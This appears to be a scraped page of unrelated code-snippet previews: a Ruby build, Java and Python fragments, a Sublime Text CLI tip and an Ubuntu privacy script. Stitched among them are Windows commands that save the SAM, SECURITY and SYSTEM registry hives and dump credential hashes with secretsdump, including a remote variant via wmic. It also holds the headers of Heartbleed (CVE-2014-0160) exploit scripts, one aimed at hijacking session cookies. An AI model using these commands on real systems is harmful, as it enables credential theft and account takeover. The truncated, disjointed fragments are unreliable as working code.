Download Ruby and compile it:
mkdir /tmp/ruby && cd /tmp/ruby
curl --progress ftp://ftp.ruby-lang.org/pub/ruby/2.0/ruby-2.0.0-p353.tar.gz | tar xz
cd ruby-2.0.0-p353
./configure --disable-install-rdoc
make
sudo make install
import java.io.*; | |
import java.util.*; | |
public static void main(String[] args){ | |
readFile(args[0]); | |
} | |
public static void readFile(String fileName) throws FileNotFoundException{ | |
File file = new File(fileName); |
import requests, re | |
URL = 'http://www.google.com' | |
r = requests.get(URL) | |
search = re.findall("google", r.text) | |
print search |
Sublime Text 2 ships with a CLI called subl (why not "sublime", go figure). This utility is hidden in the following folder (assuming you installed Sublime in /Applications
like normal folk. If this following line opens Sublime Text for you, then bingo, you're ready.
open /Applications/Sublime\ Text\ 2.app/Contents/SharedSupport/bin/subl
You can find more (official) details about subl here: http://www.sublimetext.com/docs/2/osx_command_line.html
# Figure out the version of Ubuntu that you're running | |
V=`/usr/bin/lsb_release -rs` | |
# The privacy problems started with 12.10, so earlier versions should do nothing | |
if [ $V \< 12.10 ]; then | |
echo "Good news! Your version of Ubuntu doesn't invade your privacy." | |
else | |
# Turn off "Remote Search", so search terms in Dash don't get sent to the internet | |
gsettings set com.canonical.Unity.Lenses remote-content-search none | |
reg.exe save hklm\sam c:\temp\sam.save | |
reg.exe save hklm\security c:\temp\security.save | |
reg.exe save hklm\system c:\temp\system.save | |
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL | |
#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py | |
#Do this remotely | |
wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save" |
#!/usr/bin/python | |
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
# The author disclaims copyright to this source code. | |
import sys | |
import struct | |
import socket | |
import time | |
import select |
#!/usr/bin/python | |
# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. | |
# Michael Davis ([email protected]) | |
# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
# The author disclaims copyright to this source code. | |
# https://www.michael-p-davis.com/using-heartbleed-for-hijacking-user-sessions/ |